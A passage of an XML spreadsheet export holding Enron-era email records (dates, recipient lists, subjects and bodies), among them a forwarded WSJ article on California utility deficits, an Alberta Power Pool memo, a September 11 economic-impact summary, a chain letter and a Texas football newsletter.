tion for the upstream oil and gas industry.  To purchase your copy today,  =_x000D_
visit the Rigzone Store .   Mapper is the solution ... the solution to your=_x000D_
 GIS mapping and data management needs, the solution to your offshore plann=_x000D_
ing and route creation requirements, the solution to your desire for custom=_x000D_
ized maps designed to your specifications Mapper is a user-friendly, Window=_x000D_
s-based software package backed by the power and expertise of Rigzone.  It =_x000D_
provides a complete offshore data solution enhanced with powerful drawing, =_x000D_
reporting, and data search tools.   Features:   Print your customized maps =_x000D_
up to 11x17" Export your maps using a variety of common formats (bitmap, JP=_x000D_
EG, GIF, etc.) and use the images in reports, sales materials and more Gene=_x000D_
rate custom route reports Search for mobile offshore drilling units, fields=_x000D_
, blocks, platforms, and other structures Use precision drawing tools to cu=_x000D_
stomize your maps with lines, polygons, text, symbols, and more Easy-to-lea=_x000D_
rn so it can be used by anyone  Data:   Gulf of Mexico base data: blocks, l=_x000D_
eases, cities and counties, bathymetry Gulf of Mexico platforms and caisson=_x000D_
s Gulf of Mexico pipelines for both natural gas and oil Mobile Offshore Dri=_x000D_
lling Units including detailed information such as location, rig type, stat=_x000D_
us, rig name, operator, and more updated weekly through Rigzone  To learn m=_x000D_
ore about Mapper and the ways in which it can fill your mapping and data ne=_x000D_
eds, visit: http://maps.rigzone.com/    System Requirements:  Windows 98/NT=_x000D_
4/2000, CD-ROM Drive, 100MB Hard Drive Space   System Recommendations:  28M=_x000D_
B RAM, 300MHz Pentium II Processor, or better   =09[IMAGE]=09=09_x000D_
=09=09=09[IMAGE]=09=09_x000D_
=09=09=09 Member Services If you no longer wish to receive this newsletter,=_x000D_
 you may unsubscribe by clicking here  or by logging in to Rigzone and upda=_x000D_
ting your profile.   You can also change the format you receive (HTML or Te=_x000D_
xt) and your email address by logging in and updating your account.   Click=_x000D_
 here to log in .  =09=09_x000D_
=09=09=09[IMAGE]=09=09_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Jun 2002 06:25:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brianc@saltgrass.com', 'william.hogan@anico.com', 'chet_fenner@bmc.com', 'erwollam@hotmail.com', 'knipe3@msn.com'})</t>
  </si>
  <si>
    <t>FW: The Bad News Bears.html</t>
  </si>
  <si>
    <t xml:space="preserve">Memories. I found the Quotes the funniest. _x000D_
_x000D_
-----Original Message-----_x000D_
From: Bond, Ragan _x000D_
Sent: Wednesday, June 05, 2002 3:54 PM_x000D_
To: Parks, Joe_x000D_
Subject: The Bad News Bears.html_x000D_
_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 09:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Electric Restructuring: Two Utilities In California Suffer Under_x000D_
 Deregulation --- Wholesale ...</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Miyung Buster/ENRON_DEVELOPMENT on 09/29/2000 04:33 PM _x000D_
-----_x000D_
_x000D_
	djcustomclips@djinteractive.com_x000D_
	09/27/2000 01:38 AM_x000D_
	Please respond to nobody_x000D_
		 _x000D_
		 To: 235445@mailman.enron.com_x000D_
		 cc: _x000D_
		 Subject: Electric Restructuring: Two Utilities In California Suffer Under _x000D_
Deregulation --- Wholesale ..._x000D_
_x000D_
_x000D_
 _x000D_
The Wall Street Journal Europe_x000D_
Two Utilities In California Suffer Under Deregulation --- Wholesale Power _x000D_
Costs Them More Than They Can Charge _x000D_
By Rebecca Smith _x000D_
? _x000D_
09/27/2000 _x000D_
The Wall Street Journal Europe _x000D_
8           _x000D_
(Copyright (c) 2000, Dow Jones&amp;Company, Inc.) _x000D_
_x000D_
California's two biggest utilities are losing so much money buying _x000D_
electricity in the state's deregulated market that they've run up deficits _x000D_
equivalent to half their net worth in just four months._x000D_
_x000D_
If the cost of wholesale power continues to exceed the price utilities are _x000D_
allowed to bill their customers, it's conceivable they could become _x000D_
technically insolvent sometime next year, putting pressure on regulators to _x000D_
orchestrate a multibillion-dollar public bailout. _x000D_
_x000D_
Such a scenario is quietly being discussed by bond rating agencies that _x000D_
recently reduced their credit outlooks for Pacific Gas and Electric Co., a _x000D_
unit of San Francisco-based PGOCorp., and Southern California Edison, a unit _x000D_
of Edison International of Rosemead, California. Bond rating agencies say _x000D_
they're not sure how much additional debt can be borne by the two affected _x000D_
utilities before they'll have difficulty paying their bills._x000D_
_x000D_
"If this is just a seasonal aberration, the utilities can get through it," _x000D_
says Lori Woodland, analyst for Fitch IBCA "If it goes on for six or nine _x000D_
months, it's a very serious situation."_x000D_
_x000D_
A.J. Sabatelle, senior credit officer at Moody's Investors Service, said, "At _x000D_
some point, you have a financial crisis."_x000D_
_x000D_
The utilities say they're having no difficulty meeting expenses and don't _x000D_
envision problems in servicing their debts. But they're vigorously lobbying _x000D_
state and federal regulators to change the rules of the game, hoping to _x000D_
somehow charge their customers for the shortfall. As such, California's _x000D_
experience may be a harbinger of what could happen in other states where _x000D_
wholesale power prices have surpassed the amount utilities are allowed to _x000D_
charge their rate payers._x000D_
_x000D_
Today's situation represents a complete turnabout from what was expected when _x000D_
California deregulated its energy market on March 31, 1998. California tried _x000D_
to give its utilities a competitive edge nationally by deregulating faster _x000D_
than other states and by creating a mechanism to allow investor-owned _x000D_
utilities, like PGOand Edison, to quickly pay down debts incurred to serve _x000D_
customers under the old regulatory system._x000D_
_x000D_
To do this, the state legislature set rates at high levels, which, at first _x000D_
generated fat surpluses. As the money piled up, utilities used it to pay down _x000D_
debts for generation facilities that looked like they would be unprofitable _x000D_
in the new deregulated world. By the end of June, PGO and Edison together had _x000D_
collected more than $12 billion (13.75 billion euros) and were on track to _x000D_
finish paying down debts well ahead of the March 31, 2002, deadline set by _x000D_
the legislature. At that point, rate freezes were to end and retail prices _x000D_
were to fluctuate with the market._x000D_
_x000D_
But all that went out the window in June when wholesale power prices surged. _x000D_
Average prices at state-sanctioned energy markets were four to five times the _x000D_
prices a year earlier and three to four times the level utilities could _x000D_
charge customers._x000D_
_x000D_
The cash-burn rate has been so enormous at PG&amp;E, which serves one in 20 _x000D_
Americans, that analysts expect its undercollection to exceed $3 billion -- _x000D_
half its shareholder equity of $5.7 billion -- by the end of October. _x000D_
Southern California Edison finished August with a deficit of $2 billion, _x000D_
equivalent to two-thirds of its net worth of $3.2 billion._x000D_
_x000D_
That leaves utilities in a bind. They want to end the rate freeze to be able _x000D_
to pass on the real cost of electricity to consumers. But as soon as the _x000D_
freeze ends, they get clobbered. That's because they'll immediately have to _x000D_
book a loss on their power-purchase deficits. What's more, they can't use the _x000D_
proceeds from power plant sales to cover those losses; instead, with the _x000D_
freeze ending, they'll be obliged to refund that money to ratepayers. In _x000D_
PG&amp;E's case, the refunds could total $500 million, while in Edison's case, _x000D_
the amount is $254 million._x000D_
_x000D_
Publicly at least, utility executives insist that a mechanism will be found _x000D_
to let them recoup the money spent on electricity. But that assumes _x000D_
politicians will be willing to change a law that protects ratepayers from _x000D_
this expense._x000D_
_x000D_
Consumer advocates are gearing up for the fight. Nettie Hoge, executive _x000D_
director for San Francisco consumer group the Utility Reform Network, says _x000D_
ratepayers shouldn't end up footing the bill for a deal cut by utilities that _x000D_
benefited them before prices shot up. "Our heart bleeds for the utilities, _x000D_
but they have more power to get the wholesale market fixed than we do," she _x000D_
says._x000D_
_x000D_
Utility executives are now distancing themselves from the legislation that _x000D_
got them into such a mess, which was drafted with their assistance. _x000D_
PGOChairman Robert Glynn says it's best not to "overanalyze" the "old deal." _x000D_
Instead, he says, regulators and legislators should sit down with utilities _x000D_
and construct a new agreement as "it's in the broad interests of the state _x000D_
not to have critical energy infrastructure look like a leper."_x000D_
_x000D_
Mr. Glynn says the current deal offers "mutually assured destruction" to both _x000D_
utilities and ratepayers. Something must be done, he says, or consumers _x000D_
throughout most of the state will experience "a San Diego-style rate shock." _x000D_
The utility serving that city, San Diego Gas and Electric Co., ended its _x000D_
freeze a year ago and began passing wholesale power costs directly through to _x000D_
ratepayers. Legislators intervened this summer, however, and temporarily _x000D_
capped retail rates when monthly power bills nearly tripled. As a result, San _x000D_
Diego Gas and Electric, a unit of Sempra Energy, also is accumulating a _x000D_
deficit. _x000D_
_x000D_
Folder Name: Electric Restructuring _x000D_
Relevance Score on Scale of 100: 47_x000D_
_x000D_
______________________________________________________________________ _x000D_
To review or revise your folder, visit Dow Jones CustomClipsor contact Dow _x000D_
Jones Customer  Service by e-mail at custom.news@bis.dowjones.comor by phone _x000D_
at 800-369-7466. (Outside the U.S. and  Canada, call 609-452-1511 or contact _x000D_
your local sales representative.) _x000D_
______________________________________________________________________ _x000D_
Copyright (c) 2000 Dow Jones &amp;Company, Inc. All Rights Reserved </t>
  </si>
  <si>
    <t>frozenset({'peter.keohane@enron.com', 'tmclaren@gpc.ca', 'john.lavorato@enron.com', 'tim.belden@enron.com', 'john.zufferli@enron.com', 'mark.palmer@enron.com', 'eric.thode@enron.com', 'dpef@blakes.com', 'rob.milnthorp@enron.com', 'richard.shapiro@enron.com', 'aleck.trawick@blakes.com', 'tburns@gpc.ca', 'aleck.dadson@enron.com', 'seabron.adamson@frontier-economics.com', 'derek.davies@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Update - Alberta Power Pool Rule Changes</t>
  </si>
  <si>
    <t xml:space="preserve">Dale McMaster called this afternoon to advise that the Power Pool Council _x000D_
agreed to delay any decision on the recently proposed rule changes (importers _x000D_
excluded from setting pool price and dispatch risk) for a period of two _x000D_
weeks.  During this two week period Dale has been asked to obtain stakeholder _x000D_
input into ways to address concerns about whether the spot price in the _x000D_
Alberta Power Pool is a product of interaction among competitiors in a _x000D_
efficient market.   _x000D_
_x000D_
In our discussions with the Power Pool and ADRD today and yesterday Enron _x000D_
expressed its willingness to work with the Power Pool to provide feedback on _x000D_
suggested rule changes but has also made it clear that we do not agree with _x000D_
the premise that there is a "problem" that requires "emergency" amendments to _x000D_
the Pool rules.  Our position has been that Alberta is short supply, and _x000D_
significant changes to the rules and/or market design will only discourage _x000D_
new generation development. _x000D_
_x000D_
Dale McMaster had just left the Power Pool Council meeting when he called and _x000D_
had not yet put much thought into how to define the issue he has to address _x000D_
and what the process will be.   We discussed the process and it appears he _x000D_
will likely receive comments from stakeholders at large and also assemble a _x000D_
small committee of 4-5 stakeholders (which would include Enron) to work with _x000D_
the Power Pool to consider possible changes to the Pool rules.  Dale said he _x000D_
would try to pull together a "terms of reference" document that would define _x000D_
the mandate of the small committee by tomorrow._x000D_
_x000D_
After my call with Dale McMaster, Peter Keohane and I spoke to Aleck Trawick _x000D_
and we have asked Blakes to assist us in three areas:_x000D_
_x000D_
1) Once the terms of reference of this small committee are released (and _x000D_
assuming Enron is asked to participate on the committee) Blakes will assist _x000D_
us with preparing a letter that states that Enron's participation does not _x000D_
represent acknowledgement or agreement that the Power Pool Rules must be _x000D_
amended to address the concerns of some stakeholders about real time pricing _x000D_
in Alberta and that Enron's participation on the committee is on a without _x000D_
prejudice basis;_x000D_
_x000D_
2) Enron needs to obtain the final memo from Frontier Economics in which _x000D_
Frontier provides its opinion on how the proposed rule changes: i) would _x000D_
introduce price discrimination into the Alberta electricity market, ii) would _x000D_
be contrary to the development of an efficient, fair and openly competitive _x000D_
market for electricity, iii) would compromise the independence of the Power _x000D_
Pool, and iv) would have the expected effect of artificially depressing the _x000D_
real time price of electricity in Alberta.  Once Blakes receives a copy of _x000D_
the Frontier Economics memo, they will prepare a memo for Enron advising: i) _x000D_
whether the two week process of consultation by the Power Pool is in _x000D_
accordance with the standards required of the PPC as an administrative _x000D_
tribunal operating in Alberta; and ii) whether such rule changes offend the _x000D_
provisions of the EUA;_x000D_
_x000D_
3) Blakes will advise Enron of the possible avenues of recourse (i.e. appeal _x000D_
to the AEUB, and/or legal action in the Court of Queen's Bench) in the event _x000D_
the proposed rule changes (or similar changes) are approved by the PPC at the _x000D_
end of this two week period.   GPC and Eric Thode will also be consulted on _x000D_
this issue and obviously input from all those within Enron working on this _x000D_
project will be sought prior to any decision being made to pursue any _x000D_
possible legal remedies.  _x000D_
_x000D_
Please advise if you have any comments._x000D_
_x000D_
Regards,_x000D_
_x000D_
Rob </t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 09:45:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j..sturm@enron.com', 'doug.gilbert-smith@enron.com', 'rogers.herndon@enron.com', 'dana.davis@enron.com', 'harry.arora@enron.com', 'robert.benson@enron.com'})</t>
  </si>
  <si>
    <t>FW: Economic impact of the terrorist attack</t>
  </si>
  <si>
    <t>_x000D_
FYI --- _x000D_
_x000D_
Summary from Industrial Markets ..  _x000D_
 -----Original Message-----_x000D_
From: 	Kristal, Yana  _x000D_
Sent:	Monday, September 17, 2001 10:02 AM_x000D_
To:	Enron Industrial Markets_x000D_
Cc:	McMahon, Jeffrey; Bowen Jr., Raymond_x000D_
Subject:	Economic impact of the terrorist attack_x000D_
_x000D_
Although, the impact of the tragic event of September 11 on human life loss is immeasurable, its economic impact is also hard to estimate.  This event will have a dual economic effect; short-term and long-term._x000D_
The short-term effects will be driven by a decreased consumer confidence, decreased transportation spending, decreased tourism activity, huge losses in the airline industry, and deteriorating equity markets.  _x000D_
Michigan Consumer Confidence survey for the month of August has already shown a 10-point drop, the survey was taken before the tragic event.  The major declining components of the survey included estimate of current conditions and a gauge of future expectations.  Conference Board Consumer Confidence survey is scheduled to be released on September 25.  The survey is likely to show even greater deterioration in consumer sentiment.  Consumer Confidence is the main driving component behind retail sales, retail sales of major ticket items are expected to fall in the near future due to the economic uncertainty.  Retail sales fell by 2.2 percent in January 1991, a time when Persian Gulf War began.  However, if the threat of future terrorist attacks diminishes retail sales are likely to bounce back.  Retail sales bounced back to a 1.6 percent increase in February 1991._x000D_
In a recent Gallup Poll survey taken post September 11, 50 percent of the respondents indicated that Tuesday's events make them less likely to fly.  Airline industry, already struggling before Tuesday, will be the hardest hit by this event.  On top of immense insurance losses, airlines already lost two full days of air travel.  Although revenue is lost, airlines still have to cover fixed costs during the grounding, estimated to be $100 million per day by one industry analyst.  _x000D_
The effects on the tourism industry and hotels will be mixed.  Overall tourist activity will fall, as most people will be less likely to travel both domestically and abroad in the near future.  The past year has been one of the worst years for the hotel industry, and the loss of two historical landmarks in NYC, and heightened security concerns near major landmarks will drastically reduce tourist activity.  However, the hotel industry received a temporary uplift during the time when passengers were stranded and airports were shutdown.  _x000D_
The immediate effect of Tuesday's event on the financial markets is most likely, a sharp sell-off.  Most of the global markets reacted to Tuesday's events by dropping 4-7 percent.   Effects on the U.S. markets, coupled with already troubled investors, can be expected to be much greater.  Most investors are likely to seek "refuge" in government bonds and gold, which remains at an 18-month high._x000D_
Both forest products and steel will be negatively affected in the short-term by Tuesday's events.  Reduced consumer demand for durable and non-durable goods, coupled with reduced business spending will drastically reduce purchases of homes, automobiles, and major appliances.   Also, international commodities might experience temporary price spikes as a result of increased freight rates and uncertainty over the political situation._x000D_
Many companies, such as Ford, were forced to suspend operations at several locations due to tightened border security and difficulties in obtaining parts.  Most carmakers experienced an interruption in production schedule, due to difficulties in transportation.   Some trucking companies might face Chapter 11 bankruptcy as difficulties in cross border transportation persist._x000D_
 Freight insurance rates and premiums have increased by a large amount as a result of the terrorist attack and are likely to remain at these levels, until political tensions subside._x000D_
The effects of the military action by the U.S. government on steel demand are likely to be very minimal.   Steel used in the defense industry makes up for less than 1% of the overall steel demand in the flat rolled steel markets.  So, even a dramatic increase in defense spending will have a minimal effect on the flat-rolled steel end-user demand._x000D_
_x000D_
The long-term effects will be driven by consumer confidence, fiscal policy and monetary policy._x000D_
Long-term consumer confidence will depend on whether consumers perceive this event as a one-time terrorist attack or as a precedent to a reoccurring cycle of attacks.  If this is perceived as a one-time attack and consumers expect quick return to normalcy, consumer confidence will quickly bounce back.  However, if U.S. gets involved in a long all-drawn out conflict consumer spending is bound to fall significantly._x000D_
Increased defense spending by the Federal Government is bound to help pull economy out of its current slump.  The newly reinstalled $40 billion package will help to create new blue-collar jobs, increase IT spending and cause a resurgence in construction spending._x000D_
Federal Reserve is determined to keep the economy from falling.   On Wednesday it concluded a $50 billion currency swap with the ECB and a $30 billion currency swap with the BOE in order to sustain liquidity in the currency markets.  _x000D_
Federal Reserve has cut interest rates by 50 base points before markets opened on Monday, in order to uplift investor confidence and ensure jittery investors in the Central bank's commitment to keep U.S. economy afloat._x000D_
In the long-term, effects of Tuesday's events on EIM products should be positive, coupled with the positive developments in the economy.  Demand driven economic recovery in the second half of 2002, will benefit all consumer demand driven products.  Lower interest rates will make it easier for companies to borrow and obtain new loans._x000D_
_x000D_
_x000D_
Yana Kristal_x000D_
Enron Industrial Markets_x000D_
(713) 345-8497</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'steve.hooser@enron.com'})</t>
  </si>
  <si>
    <t>EOL Int. Transportation</t>
  </si>
  <si>
    <t>I would like to set up a meeting with one of you to talk about EOL _x000D_
transportation business.  Lauri and I could come by and show you what we _x000D_
intend to do and some of the information we have gathered.  We will need your _x000D_
help to get a GTC / contract together that will cover the business we intend _x000D_
to do.  EDG</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 00:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: The Paul Harvey Philosophy</t>
  </si>
  <si>
    <t xml:space="preserve">We need to keep this for Jackson._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 02/16/2001 _x000D_
08:22 AM ---------------------------_x000D_
_x000D_
_x000D_
"Jason Dobbs" &lt;jmjaked@mindspring.com&gt; on 02/15/2001 08:43:06 PM_x000D_
To: &lt;WhaleyJeri@russellcorp.com&gt;, "tyson davis" &lt;zeked@mindspring.com&gt;, "Rick _x000D_
Duboise" &lt;rick_duboise@soenergyhomes.com&gt;, "phil love" _x000D_
&lt;phillip.m.love@enron.com&gt;, "Paulk, Ray" &lt;RPaulk@HMSTEAD.com&gt;, "Louis Bowen" _x000D_
&lt;bowenx2@earthlink.net&gt;, "Lee Mobley" &lt;leemobley@excite.com&gt;, "Jim Wood" _x000D_
&lt;jwood@regionsbank.com&gt;, "frank bori" &lt;frank4au@alltel.net&gt;, _x000D_
&lt;DanaNSanders@aol.com&gt;, "Chris Myrick" &lt;Phish12356@aol.com&gt;, "chris _x000D_
chambless" &lt;gwave85@hotmail.com&gt;, "Caleb" &lt;dobbsmw@mail.auburn.edu&gt;, "Boo _x000D_
Boo" &lt;Shane.Dobbs@fctg.com&gt;, "Bill Sanders" &lt;BillSanders22@aol.com&gt;, "Ashley _x000D_
Myrick" &lt;Congmyrick@aol.com&gt;, "Amy Franks" &lt;darmy4@sonet.net&gt;_x000D_
cc:  _x000D_
Subject: Fw: The Paul Harvey Philosophy_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
----- Original Message -----  _x000D_
From: Tony Autrey _x000D_
To: Tex Johnson ; Scott Reese ; regina hooper ; Jason  Dobbs ; Dozier, Jamie _x000D_
; David Tomita NW BG&lt;KY ; Dave Owen ; Darrell and Amy Franks  _x000D_
Sent: Friday, February 02, 2001 9:01 PM_x000D_
Subject: Fw: The Paul Harvey Philosophy_x000D_
_x000D_
?_x000D_
----- Original Message -----  _x000D_
From: Mike Dodd _x000D_
To: Wesley &amp; Jan McNeill ; Wendell Dodd ; Wendell  &amp; Julie Franks ; Wendall _x000D_
McCollum ; Weldon Watson ; Wayne Farris ; Vicki Monroe ; Tracy Estes ; Tommy  _x000D_
Strickland ; Tim Lacey ; Tim Bradford ; Tim Boozer ; Tim  Beckett ; Tim &amp;  _x000D_
Dannielle Roberts ; Terry  &amp; Andrea Samuels ; Tex Johnson ; Steve Fair ; _x000D_
sherrie  behel ; Sam Wiggins ; Sam Richardson ; Russ  Wilson ; Roy Filyaw ; _x000D_
Rita Wilson ; Ricky Spiller ; Rick Walker ; Rhonda (wk) Taylor ; Randy _x000D_
Webster ; Randy and Bella  Garner ; Quanna Fuqua ; Phil Guin ; Phillip Harrod _x000D_
@ hm ; Paul Tyler ; Pat McGaha ; Pat Creel ; Neil Mentz ; Natalie  Maddox ; _x000D_
Mike Fennel ; Melissa  Burgess ; Melissa (Carothers) Beard ; Mary Mullis  _x000D_
Graves ; Mark  Mordecai ; mark gran ; Lori K. Taylor ; Margaret  Dodd ; M  P _x000D_
Hughes ; Lizzie  Duff ; Laurie  Martin ; Larry  Hood ; Kitty  Brasher ; Kip _x000D_
Faught ; KEVIN L. HOOD ; Kevin  Bradford ; Kelly Hunter ; KARLA ; Kacie Dodd _x000D_
; John Landers ; John Garner ; Joel Spec ; Jim Dodd ; Jerry McGaha ; Jerry _x000D_
Henson ; Jeff Tesney ; Jeff Harber ; Jeff Hughes ; Jean Taylor ; Hannah Crump _x000D_
; Heath &amp; Pattie  Nix ; Ginger  Elliott ; Faye Guin ; Eddie &amp;  Debbie Posey ; _x000D_
Ed  Howell ; Debbie Chaffin ; David Warren ; Deah &amp; Joseph Webster  ; Daryl  _x000D_
&amp; Stephanie Price ; David Stookey ; David Donavon ;  Dale Hubbert ; Dale Dodd _x000D_
; Cullen &amp; Peggy  Wood ; Chuck Mullins ; Christie King Ray ;  Charles Burks  _x000D_
; Chad  Cotton ; Butch Robinson ; Bull Langston ; Bones ; Brad ; Bobbie _x000D_
Burgess ; Bobby &amp; Wendy Horton  ; Bob &amp;  Jill Hawkins ; Billy Franks ; Bill _x000D_
Sager ; Annette ; Angela Ferraez _x000D_
Sent: Friday, February 02, 2001 7:41 AM_x000D_
Subject: The Paul Harvey Philosophy_x000D_
_x000D_
The Paul Harvey Philosophy_x000D_
_x000D_
These things I wish  for each of you....._x000D_
We tried so hard to make things better for our kids that  we made them worse._x000D_
For my grandchildren, I'd like better. I'd really like  for them to know _x000D_
about hand-me_x000D_
down clothes and homemade ice cream and  leftover meatloaf sandwiches. I _x000D_
really would. I hope you learn humility by being  humiliated, and that you _x000D_
learn honesty by being cheated._x000D_
_x000D_
I hope you learn  to make your bed and mow the lawn and wash the car. And I _x000D_
really_x000D_
hope nobody  gives you a brand new car when you are sixteen._x000D_
_x000D_
It will be good if at  least one time you can see puppies born and your old _x000D_
dog put to_x000D_
sleep. I hope  you get a black eye fighting for something you believe in._x000D_
_x000D_
I hope you  have to share a bedroom with your younger brother. And it's all _x000D_
right if  you_x000D_
have to draw a line down the middle of the room, but when he wants to  crawl _x000D_
under the_x000D_
covers with you because he's scared, I hope you let him. When  you want to _x000D_
see a movie_x000D_
and your little sister wants to tag along, I hope  you'll let her._x000D_
_x000D_
I hope you have to walk uphill to school with your  friends and that you live _x000D_
in a_x000D_
town where you can do it safely. On rainy days  when you have to catch a _x000D_
ride, I hope_x000D_
you don't ask your 'driver' to drop you  two blocks away so you won't be seen _x000D_
riding_x000D_
with someone as uncool as your  Mom. If you want a slingshot, I hope your Dad_x000D_
teaches you how to make one  instead of buying one._x000D_
_x000D_
I hope you learn to dig in the dirt and read  books. When you learn to use _x000D_
computers,_x000D_
I hope you also learn to add and  subtract in your head._x000D_
_x000D_
I hope you get teased by your friends when you  have your first crush on a _x000D_
girl, and_x000D_
when you talk back to your mother that  you learn what Ivory soap tastes like._x000D_
_x000D_
May you skin your knee climbing a  mountain, burn your hand on a stove and _x000D_
stick your tongue on a frozen flagpole.  I don't care if you try a beer once, _x000D_
but I hope you don't like it. And if a  friend offers you dope or a joint, I _x000D_
hope you realize he is not your  friend._x000D_
_x000D_
I sure hope you make time to sit on a porch with your Grandma and  go fishing _x000D_
with your Uncle._x000D_
_x000D_
May you feel sorrow at a funeral and joy  during the holidays._x000D_
_x000D_
I hope your Mother punishes you when you throw a  baseball through a _x000D_
neighbor's_x000D_
window and that she hugs you and kisses you at  Christmas time when you give _x000D_
her a mold of your hand._x000D_
_x000D_
These things I wish  for you: tough times and disappointment, hard work and _x000D_
happiness._x000D_
To me, it's  the only way to appreciate life._x000D_
_x000D_
Send this to all of your friends that  mean the most to you but, don't send _x000D_
it back to_x000D_
whoever sent it to you. They  have already read it and you don't need to show _x000D_
them that you are a good friend.  They already know!_x000D_
_x000D_
"We secure our friends not by accepting favors but by  doing them."_x000D_
_x000D_
Paul Harvey - "Good Day"!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 5 Jan 2002 02:37:01 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/5/02; HourAhead hour: 5;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/5/02; HourAhead hour: 5;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010505.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 5 / Preferred:  35.00 / Final:  34.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/5/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 23:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>True Orange Fax/E-Mail #102</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David M Gagliardi/TTG/HouInd on_x000D_
10/31/2000 07:55 AM ---------------------------_x000D_
_x000D_
_x000D_
mggagliardi@duke-energy.com on 10/31/2000 07:15:20 AM_x000D_
_x000D_
To:   DGagliardi@reliantenergy.com, David_Ricks@GSDM.com,_x000D_
Tony.A.Rogers@fritolay.com_x000D_
cc:_x000D_
_x000D_
Subject:  True Orange Fax/E-Mail #102_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael_x000D_
Gagliardi/Hou-ComOps/EnergyTrading/PEC on 10/31/2000 07:14 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
TruOrange@aol.com on 10/30/2000 09:06:41 PM_x000D_
_x000D_
To:   TruOrange@aol.com_x000D_
cc:_x000D_
Subject:  True Orange Fax/E-Mail #102_x000D_
_x000D_
_x000D_
True Orange Fax/E-Mail Service_x000D_
Volume 8, Fax/E-Mail #102, Monday, October 30, 2000_x000D_
Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
Phone_x000D_
512-795-8536_x000D_
_x000D_
Kansas Game Set for 1 p.m., No TV; Brown Says Tech Dangerous Foe_x000D_
_x000D_
The Longhorns' game next week at Kansas has been set for 1 p.m. with no_x000D_
television. This is the second faraway game this year that has not been_x000D_
televised. The other one was at Colorado._x000D_
Folks, one of the primary reasons that was given for the Longhorns playing_x000D_
Louisiana-Lafayette with that ridiculous 11 a.m. kickoff back in early_x000D_
September when it was hot as blazes was that the TV brass appreciated Texas_x000D_
making an extra effort and would reciprocate down the line._x000D_
Well, it hasn't happened. The Baylor-A&amp;M game was shown in place of the_x000D_
Texas-Colorado game back on Oct. 14. Any big Baylor or A&amp;M fans could make_x000D_
it_x000D_
to Waco a lot easier than Longhorn fans could make it to Boulder._x000D_
Don't let anyone tell you that UT has any extra pull with the TV guys. When_x000D_
neither of our two longest Big 12 road trips get picked up by TV, that_x000D_
tells_x000D_
you we have zero stroke with the networks._x000D_
Last season, 12 of Texas' 14 games were televised. So far this season, 5 of_x000D_
8 have been televised. We're already worse off than last year with three_x000D_
regular season games to go._x000D_
And don't bank on pay-per-view. The Big 12 contract with ABC doesn't allow_x000D_
pay-per-view that would conflict with the ABC college telecasts._x000D_
* * * *_x000D_
Coach Mack Brown said Monday the Longhorns are in for a terrific battle in_x000D_
Lubbock Saturday night. He said the Raiders "run a no-huddle offense. They_x000D_
might get 90 plays. We'd better have a bunch of guys ready to rush the_x000D_
passer."_x000D_
He said the Raiders throw on nearly every down, and he said the UT coaches_x000D_
will play a lot of people on defense to try to keep fresh pass rushers in_x000D_
the_x000D_
game._x000D_
He also said the last three games of the season against Texas Tech  and_x000D_
Kansas on the road and Texas A&amp;M in Austin are all tough games. "I told the_x000D_
players we could end up 6-5 or we could end up  9-2," he said. "I really_x000D_
don't know."_x000D_
Brown said the Longhorns are 5-5 in their last 10 trips to Lubbock. He is_x000D_
0-1_x000D_
in his one trip to Lubbock with the Longhorns because the Raiders took a_x000D_
42-35 victory in 1998, the last time the Horns came to town. But Brown is_x000D_
1-1_x000D_
against the Raiders because Texas mauled Tech last year in Austin, 58-7._x000D_
Mike Leach, the Tech coach, was offensive coordinator at OU last year, and_x000D_
Brown said, "Texas Tech runs the same offensive scheme that Oklahoma runs._x000D_
That should get our attention."_x000D_
He said Raider QB Kliff Kingsbury "is one of the top quarterbacks in the_x000D_
league and in the nation. He is much improved."_x000D_
* * * *_x000D_
It will be strength vs. strength when Kingsbury, the most prolific passer_x000D_
in_x000D_
Division I, throws against the Texas defense, which is No. 1 in the nation_x000D_
in_x000D_
pass efficiency with a very good 82.69 rating. The Longhorns also are 10th_x000D_
in_x000D_
passing yardage yielded, giving up just 168 yards per game._x000D_
* * * *_x000D_
FOOTBALL RECRUITING  NOTES: The Longhorns are still at 19 commitments._x000D_
Super_x000D_
safety Dewayne Brandon of Temple says he is pretty sure he will sign with_x000D_
either Texas or Florida State. Super OL Jami Hightower of Jacksonville says_x000D_
it is still a three-way race between Texas, A&amp;M and Nebraska. He says he_x000D_
plans to come to the Texas-A&amp;M game._x000D_
* * * *_x000D_
FOOTBALL NOTES: Roy Williams has caught passes for a UT freshman record 514_x000D_
yards this year and B. J. Johnson is close behind him with 446. Williams_x000D_
also_x000D_
is the leading freshman receiver in the nation in terms of yardage gained._x000D_
